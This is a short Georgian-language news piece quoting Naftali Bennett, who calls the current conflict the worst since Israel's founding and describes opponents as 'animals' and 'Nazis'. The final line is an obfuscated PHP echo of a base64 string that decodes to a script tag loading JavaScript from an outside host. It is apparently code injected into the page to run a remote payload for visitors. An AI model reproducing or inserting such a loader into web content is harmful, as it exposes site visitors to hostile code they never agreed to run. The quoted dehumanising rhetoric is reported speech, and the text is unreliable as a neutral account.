celsiusi
ავერსი საქკაბელი

 ისრაელის ყოფილი პრემიერ-მინისტრი, ნაფთალი ბენეტი მიმდინარე კონფლიქტს დამოუკიდებლობის ომის შემდეგ ყველაზე მძიმე მოვლენას უწოდებს.

„ეს არ არის იომ-კიპურის ომი – ეს არის იომ-კიპური გამრავლებული 100-ზე, რადგან აქ ვსაუბრობთ მკვლელობაზე, ჩვილების, გოგონების, ბიჭების სისტემატურ ხოცვაზე. ეს არის, რაც ხდება და რაც ძალიან ძნელი ასატანია. ჩვენ შევქმენით ებრაული სახელმწიფო ამ მიწაზე, რათა დავიცვათ თავი და ახლა დადგა დრო, რომ საპასუხოდ ვიბრძოლოთ“, – ამბობს ბენეტი.

ისრაელის ყოფილმა პრემიერ-მინისტრმა ხაზგასმით აღნიშნა, რომ ეს არის ომი ირანთან, რომელიც მართავს „ჰამასს“, „ისლამურ ჯიჰადსა“ და „ჰეზბოლას“.

„როდესაც ჩვენ ვდგავართ ირანელი მტრის – „ჰამასის“, „ისლამური ჯიჰადის“, „ჰეზბოლას“, ირანის წინაშე – ნაცისტური კონცეფციის წინაშე ვდგავართ. ეს წარსულში არ მითქვამს. ვერასდროს წარმოვიდგენდი, რომ მოვიდოდნენ და ბავშვებს ყელს გამოჭრიდნენ. ესენი ცხოველები არიან. ჩვენ უნდა გავუმკლავდეთ ამას ისე, თითქოს ისინი ნაცისტები არიან. რასაც ჩვენ ვუკეთებდით ნაცისტებს, იგივე უნდა გავუკეთოთ. ეს არის ყველაზე ცუდი პერიოდი სახელმწიფოს ისტორიაში, თუმცა ჩვენ ძლიერები ვართ და ჩვენ გავიმარჯვებთ“, – განაცხადა ისრაელის ყოფილმა პრემიერ-მინისტრმა.

279
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");